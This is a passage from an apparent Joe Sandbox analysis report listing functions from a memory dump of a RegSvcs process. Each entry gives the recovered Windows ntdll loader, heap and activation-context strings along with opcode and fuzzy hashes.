                                                                                                              • Opcode Fuzzy Hash: 93dcb463bfad54ac9a9202e3e325b02f89dabf770aaf36d6f8b7f7514b46904f
                                                                                                              • Instruction Fuzzy Hash: D8912672A41702AFD721EF68CC90B6A7BA9FB94B14F48465CFA42AF258C7709C01C795
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                              • API String ID: 0-1109411897
                                                                                                              • Opcode ID: b6c04525dc527ddacb9bd6850d4a4b6f56e0c1760f2a4fb01d2edc78f611a4ca
                                                                                                              • Instruction ID: fe22e31b174e97f1e31f88c4ab10505159ae4bcaa453011ec58da2c3cc7beceb
                                                                                                              • Opcode Fuzzy Hash: b6c04525dc527ddacb9bd6850d4a4b6f56e0c1760f2a4fb01d2edc78f611a4ca
                                                                                                              • Instruction Fuzzy Hash: F1A22874A0562A8FDF64DF18CD887AEBBB5BF45304F1442EAD909AB250DB309E81CF51
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-792281065
                                                                                                              • Opcode ID: f245f494a02bca524fe77893276ac52501f76e8bb1a83fc3b95ccd5db6190aeb
                                                                                                              • Instruction ID: 8d7b75a5455382d253eeee169b85ae14ca31f506f6abc449003d19a3ccca0948
                                                                                                              • Opcode Fuzzy Hash: f245f494a02bca524fe77893276ac52501f76e8bb1a83fc3b95ccd5db6190aeb
                                                                                                              • Instruction Fuzzy Hash: AB910470B00316AFDB3AAF98DC85BAEBBA1BB50B14F14425CDA016F3C1DBB09901C795
                                                                                                              Strings
                                                                                                              • apphelp.dll, xrefs: 01586496
                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 015E9A2A
                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015E99ED
                                                                                                              • LdrpInitShimEngine, xrefs: 015E99F4, 015E9A07, 015E9A30
                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 015E9A01
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015E9A11, 015E9A3A
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-204845295
                                                                                                              • Opcode ID: a37f06510924a8efeb538797d6b22ce4951c78bc6b2f2f5ef81dfaa21e9e8bcc
                                                                                                              • Instruction ID: 2bfbd30a55d350deee2651dfdb88b91695c808962cc42f16e638eca6fe15ca9a
                                                                                                              • Opcode Fuzzy Hash: a37f06510924a8efeb538797d6b22ce4951c78bc6b2f2f5ef81dfaa21e9e8bcc
                                                                                                              • Instruction Fuzzy Hash: 42519F71608305AFE725EF24DC45AAFB7E9FF84648F40091DE585AF260D670E944CB92
                                                                                                              Strings
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01602180
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 01602165
                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 01602160, 0160219A, 016021BA
                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0160219F
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016021BF
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01602178
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                              • API String ID: 0-861424205
                                                                                                              • Opcode ID: 5f7d298cc6879ba6215782a751ddbef87187aa54e27673b32b968262ac74a0e1
                                                                                                              • Instruction ID: 70479e687f8b0c9c1813c5039002a8e0156343971cae9615e4fc9599cd2eb385
                                                                                                              • Opcode Fuzzy Hash: 5f7d298cc6879ba6215782a751ddbef87187aa54e27673b32b968262ac74a0e1
                                                                                                              • Instruction Fuzzy Hash: E2312A36A40211BBE7128ED5DC89F5B7AB9FF54E40F0540ADBB04AF240D7709A01C6A0
                                                                                                              Strings
                                                                                                              • LdrpInitializeProcess, xrefs: 015CC6C4
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01608181, 016081F5
                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 01608170
                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 016081E5
                                                                                                              • LdrpInitializeImportRedirection, xrefs: 01608177, 016081EB
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015CC6C3
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-475462383
                                                                                                              • Opcode ID: 4f682fe3b71dd6b4a0964c23e6a281e4525570f7090ffb8a92bdefa3468cb999
                                                                                                              • Instruction ID: 3d1c9ef19e16245658153fdffde39ee118036a789d2028541097d6384ddfd47a
                                                                                                              • Opcode Fuzzy Hash: 4f682fe3b71dd6b4a0964c23e6a281e4525570f7090ffb8a92bdefa3468cb999
                                                                                                              • Instruction Fuzzy Hash: AD31E071644712AFC324EF68DD86E2B7795BFD4B24F040A6CF944AF291E660EC04C7A2
                                                                                                              APIs
                                                                                                                • Part of subcall function 015D2DF0: LdrInitializeThunk.NTDLL ref: 015D2DFA
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D0BA3
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D0BB6
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D0D60
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D0D74
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 1404860816-0
                                                                                                              • Opcode ID: aa6f3a84fe3c172d5602b9f941ba37ccbd71a9cdf6e35f1e8d180a067a86d194
                                                                                                              • Instruction ID: a29bbe668b590112b164c4d164c9a55b92ebfc049cd5c5fac63f90de54a538d1
                                                                                                              • Opcode Fuzzy Hash: aa6f3a84fe3c172d5602b9f941ba37ccbd71a9cdf6e35f1e8d180a067a86d194
                                                                                                              • Instruction Fuzzy Hash: B6425A71900716DFDB25CF28C880BAAB7F5FF44314F1445AAE9899B282D770AA85CF60
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                              • API String ID: 0-379654539
                                                                                                              • Opcode ID: 03c042d9c5b7bd2ce449d04f7dac8e5aca71056ab94c28616d3ec1260575cbc0
                                                                                                              • Instruction ID: 0abf4257855c6b09729cf8ba5588c97204a98bfbd12837d044a299474b48c4a8
                                                                                                              • Opcode Fuzzy Hash: 03c042d9c5b7bd2ce449d04f7dac8e5aca71056ab94c28616d3ec1260575cbc0
                                                                                                              • Instruction Fuzzy Hash: 15C169746083829FDB21CF58C144B6AB7E4BF85704F04896EFA998F251E774C949CBA3
                                                                                                              Strings
                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015C855E
                                                                                                              • @, xrefs: 015C8591
                                                                                                              • LdrpInitializeProcess, xrefs: 015C8422
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015C8421
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1918872054
                                                                                                              • Opcode ID: 5bc1626fe3f95e0182ae6513468e3acee36b9b545cc619e6f70ea5a5260ede53
                                                                                                              • Instruction ID: 574bf112b7c7dfdc0caf7b82bf0e21cf7bfc036c6e7f3c8f17e0396f7fc9a3d6
                                                                                                              • Opcode Fuzzy Hash: 5bc1626fe3f95e0182ae6513468e3acee36b9b545cc619e6f70ea5a5260ede53
                                                                                                              • Instruction Fuzzy Hash: CD919E71508346AFE722DF65CC80EAFBAECBF94B44F40092EF6859A150E374D904CB62
                                                                                                              Strings
                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016021D9, 016022B1
                                                                                                              • .Local, xrefs: 015C28D8
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 016021DE
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016022B6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                              • API String ID: 0-1239276146
                                                                                                              • Opcode ID: 8b880e59180ea33041531c06fe0db1aba83dcee4d45dc169be3732775f29fda2
                                                                                                              • Instruction ID: 3f1facf24e6b014fa1ac4847276c1a8a2c62660d1c7d8a43c2725902871a29d5
                                                                                                              • Opcode Fuzzy Hash: 8b880e59180ea33041531c06fe0db1aba83dcee4d45dc169be3732775f29fda2
                                                                                                              • Instruction Fuzzy Hash: B5A19C3190022A9FDB25CFA8DC88BAAB7B1BF58754F1545EDD908AB251D7709EC0CF90
                                                                                                              Strings
                                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01603437
                                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0160342A
                                                                                                              • RtlDeactivateActivationContext, xrefs: 01603425, 01603432, 01603451
                                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01603456
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                              • API String ID: 0-1245972979
                                                                                                              • Opcode ID: 94ff738cc87528d263f23eda47e04817e6ce60aa153da2626b8b13524d822215
                                                                                                              • Instruction ID: 29582c4a6ebe4e29e90d9f54958dde9cc1adaec5983934b099d3a2d4be2d916b
                                                                                                              • Opcode Fuzzy Hash: 94ff738cc87528d263f23eda47e04817e6ce60aa153da2626b8b13524d822215
                                                                                                              • Instruction Fuzzy Hash: E961FD366416129FDB278E5CCC92F2AB7E1FF80B11F15852DE8559F390DB30E8018B91
                                                                                                              Strings
                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 015F1028
                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 015F106B
                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015F10AE
                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 015F0FE5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                              • API String ID: 0-1468400865
                                                                                                              • Opcode ID: f28d942f4e6dbe5e16af3f7a432539ec323f5cadff884569fa65f8b61c4fc9f5
                                                                                                              • Instruction ID: 5c912b82d0b8419f707fbc1472d3fa86f8d0bd59909ea2bac73b5a626e0fca50
                                                                                                              • Opcode Fuzzy Hash: f28d942f4e6dbe5e16af3f7a432539ec323f5cadff884569fa65f8b61c4fc9f5
                                                                                                              • Instruction Fuzzy Hash: 7071B0B19043069FCB21DF18C885B9B7BA9BF95764F844868F9488F186D734D588CBD2
                                                                                                              Strings
                                                                                                              • LdrpDynamicShimModule, xrefs: 015FA998
                                                                                                              • apphelp.dll, xrefs: 015B2462
                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 015FA992
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015FA9A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-176724104
                                                                                                              • Opcode ID: 5c3a6290bf378068f2d59e38b0228a5f0b391ca9d5d2c43fe40c85d5be26c211
                                                                                                              • Instruction ID: 5737df50f2a51b5261ae8b8c303ff5f631d19a748b2858119d04fcf500f8d061
                                                                                                              • Opcode Fuzzy Hash: 5c3a6290bf378068f2d59e38b0228a5f0b391ca9d5d2c43fe40c85d5be26c211
                                                                                                              • Instruction Fuzzy Hash: B8314671610202BBDB31AF59DD81EAE7BB4FB80B00F16012DEA056F345C7B0A851C791
                                                                                                              Strings
                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 015A327D
                                                                                                              • HEAP: , xrefs: 015A3264
                                                                                                              • HEAP[%wZ]: , xrefs: 015A3255
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                              • API String ID: 0-617086771
                                                                                                              • Opcode ID: 534154be0c48d553f66fae68609f4cf9e933dc98f236505f57d21acb3b9b2e0f
                                                                                                              • Instruction ID: 4681bb58c2f26c377d9a70c33667ef7b3dcf4282a5ba644cd7b8bb80acf91450
                                                                                                              • Opcode Fuzzy Hash: 534154be0c48d553f66fae68609f4cf9e933dc98f236505f57d21acb3b9b2e0f
                                                                                                              • Instruction Fuzzy Hash: E992DC70A442499FDB25CFA8C4457AEBBF1FF48304F5884A9E95AAF351D334A941CF50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-4253913091
                                                                                                              • Opcode ID: e26830a80e191111c067ea18c2ac7319ff63817ae729d6af1f51430dd059b676
                                                                                                              • Instruction ID: 899a5227f074a1cfd4147768bb830d0cbe2a41cae65609bf3d428a3f67cea99c
                                                                                                              • Opcode Fuzzy Hash: e26830a80e191111c067ea18c2ac7319ff63817ae729d6af1f51430dd059b676
                                                                                                              • Instruction Fuzzy Hash: 34F19B30A50606DFEB25CF68C894B6EBBF5FB44304F5486A8E5469F391D730E981CB90
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $@
                                                                                                              • API String ID: 0-1077428164
                                                                                                              • Opcode ID: ec4e16244196d3136ac8bf84fc58643e5f0b2081c0839f7a7d0605e9d70ca0fb
                                                                                                              • Instruction ID: e90d2920bf5ef704da3b1441429fe58c46ca41138d25bb3f1500a1e873199468
                                                                                                              • Opcode Fuzzy Hash: ec4e16244196d3136ac8bf84fc58643e5f0b2081c0839f7a7d0605e9d70ca0fb
                                                                                                              • Instruction Fuzzy Hash: 88C25D716083459FDB25CF28C881BAFBBE5BFC8754F04892DEA898B291D734D845CB52
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                              • API String ID: 0-2779062949
                                                                                                              • Opcode ID: a517b525724dbcae17cc69e64e96a1bd83acd7aa17d2c20fd003c9ab6de2f2cd
                                                                                                              • Instruction ID: f29983a5c6bfca4f9ca0771e46d44eb12c801ce49ca42f8b09a3a0749fec1160
                                                                                                              • Opcode Fuzzy Hash: a517b525724dbcae17cc69e64e96a1bd83acd7aa17d2c20fd003c9ab6de2f2cd
                                                                                                              • Instruction Fuzzy Hash: 58A13C71D1162A9BDB359F68CC88BADB7B8FF48710F1041EAD909AB250E7359E84CF50
                                                                                                              Strings
                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 015FA10F
                                                                                                              • LdrpCheckModule, xrefs: 015FA117
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015FA121
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-161242083
                                                                                                              • Opcode ID: 466805270c8ac7d85d1e3c8fd4ef79af23f30780748b184c381c48ce8298f5eb
                                                                                                              • Instruction ID: 3ef61e475d686ddc25d2fb1cc75a3214722d401e4d71753ae64ba604f75ece1a
                                                                                                              • Opcode Fuzzy Hash: 466805270c8ac7d85d1e3c8fd4ef79af23f30780748b184c381c48ce8298f5eb
                                                                                                              • Instruction Fuzzy Hash: 4F71EC70A00206EFDB25EF68CC81ABEB7F4FB88704F15442DE906AF291E730A941CB51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-1334570610
                                                                                                              • Opcode ID: d7ae889b22459333fb3a56340bf87ddc0a59b6bbecf1b70a7334c9e850e83775
                                                                                                              • Instruction ID: ec933785e8d95cd12b8ad395f13cc1eedc889c3c3bc1967b0cd5f4f7dbbf6159
                                                                                                              • Opcode Fuzzy Hash: d7ae889b22459333fb3a56340bf87ddc0a59b6bbecf1b70a7334c9e850e83775
                                                                                                              • Instruction Fuzzy Hash: 2E619D706603069FDB29DF28C940B6EBBE1FF44704F54855DE95A8F292D770E881CB91
                                                                                                              Strings
                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 016082D7
                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 016082DE
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 016082E8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1783798831
                                                                                                              • Opcode ID: a6e2b09511265d4f6110b94caf52d32033857abcadfa661994f37597d0e5e3d5
                                                                                                              • Instruction ID: 533c75133a2566ef4758803167121ee7c727d54acfcc8a87609da03ede72ae15
                                                                                                              • Opcode Fuzzy Hash: a6e2b09511265d4f6110b94caf52d32033857abcadfa661994f37597d0e5e3d5
                                                                                                              • Instruction Fuzzy Hash: 2D41D071550312ABC721EFA8DC44B5F7BE8FB98B54F004A2EB949DB290E770D8108B92
                                                                                                              Strings
                                                                                                              • @, xrefs: 0164C1F1
                                                                                                              • PreferredUILanguages, xrefs: 0164C212
                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0164C1C5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                              • API String ID: 0-2968386058
• Opcode ID: e12375df721db5eddfd1cf3694e8fc9088d935822dcf0506dc59c040db29e335
• Instruction ID: c499b643916bef4a51ba988129c7cf8eeac2772d9f48b1dac4cae7a6f380fad4
• Opcode Fuzzy Hash: e12375df721db5eddfd1cf3694e8fc9088d935822dcf0506dc59c040db29e335
• Instruction Fuzzy Hash: 38416271E1120AEBDB11DED9CC51FEFBBB8BB54704F14806AE605B7340E7B49A458B50
Strings
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
• API String ID: 0-1373925480
• Opcode ID: aa202f814b564eabbddd6b0b9124eacc10859c5efe3c8ea085f5a1341b259f0b
• Instruction ID: d6f5a90e7c66356d33f3074fc264097ad29073c01750ff5a6f5e2b2d8083ac41
• Opcode Fuzzy Hash: aa202f814b564eabbddd6b0b9124eacc10859c5efe3c8ea085f5a1341b259f0b
• Instruction Fuzzy Hash: 71410131A01A69CBEB229BE9CC44BACBBB8FF96340F244459D901EF381DB758901CF51
Strings
• Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01614888
• minkernel\ntdll\ldrredirect.c, xrefs: 01614899
• LdrpCheckRedirection, xrefs: 0161488F
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
• API String ID: 0-3154609507
• Opcode ID: 2f87cb72fec8fa5d708c61dbbf0f6274d5fc7e18c8ce65d3c7eefbb2cf6af616
• Instruction ID: e6c1565e1e20f6a50ebd16a337b9993ac8a317f6d54e2d2684df811a1e8e1e8f
• Opcode Fuzzy Hash: 2f87cb72fec8fa5d708c61dbbf0f6274d5fc7e18c8ce65d3c7eefbb2cf6af616
• Instruction Fuzzy Hash: 2641C172A046519FCB62CE6CDC40A267BE9BF49B90F0E066DED499B359DB30D801CB91
Strings
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-2558761708
• Opcode ID: a63a6729dfc6857c4b7e1c2c7f23d6260b878a1f80deb7c44ff02a468e0c1d5e
• Instruction ID: cde7c993a81f93480e6dadb452fbf354d9102a9e1a21cdae6727c3ed7337bbeb
• Opcode Fuzzy Hash: a63a6729dfc6857c4b7e1c2c7f23d6260b878a1f80deb7c44ff02a468e0c1d5e
• Instruction Fuzzy Hash: 1D11DC313B41069FDB29DA28C848B6EB3A8FF80A16F18856DF506CF291EB34E841C754
Strings
• LdrpInitializationFailure, xrefs: 016120FA
• Process initialization failed with status 0x%08lx, xrefs: 016120F3
• minkernel\ntdll\ldrinit.c, xrefs: 01612104
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
• API String ID: 0-2986994758
• Opcode ID: 3d024ac136c10fb3b156c0fa01b52034fd525324b1302916ca5e04578d2e895a
• Instruction ID: 82ed088170871627eab7cf2df1020d1b3ee2f87abb402bfa4fa9cc247ef5346e
• Opcode Fuzzy Hash: 3d024ac136c10fb3b156c0fa01b52034fd525324b1302916ca5e04578d2e895a
• Instruction Fuzzy Hash: 2EF02234640309BBE724E64DDC53FAA3B68FB40B04F24045CFB006B785D2B0E980C684
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: #%u
• API String ID: 48624451-232158463
• Opcode ID: 60f6b0faa07c47b0d6657a799b9c9f341a7de3d2fe24bb2c6dd8a6ac6c02d17e
• Instruction ID: caae78899ba3c019b759af512f8b2a7a2d4815e10baaa71677096e014533ce93
• Opcode Fuzzy Hash: 60f6b0faa07c47b0d6657a799b9c9f341a7de3d2fe24bb2c6dd8a6ac6c02d17e
• Instruction Fuzzy Hash: 4D715D71A0014ADFDB11DFA8C990BAEB7F8FF48344F144069EA05EB291E634ED41CBA0
Strings
• LdrResSearchResource Exit, xrefs: 0159AA25
• LdrResSearchResource Enter, xrefs: 0159AA13
Memory Dump Source
• Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
• API String ID: 0-4066393604
• Opcode ID: ed75efd26afe91f5355411e8a6912c2c24fd5a573488b9fc7d7f0ecb7e0b34c3
• Instruction ID: 2cc58f759065872adc2c06ce2fbe586920ba84f9b42e685cc1e57b41e3a4897e
• Opcode Fuzzy Hash: ed75efd26afe91f5355411e8a6912c2c24fd5a573488b9fc7d7f0ecb7e0b34c3
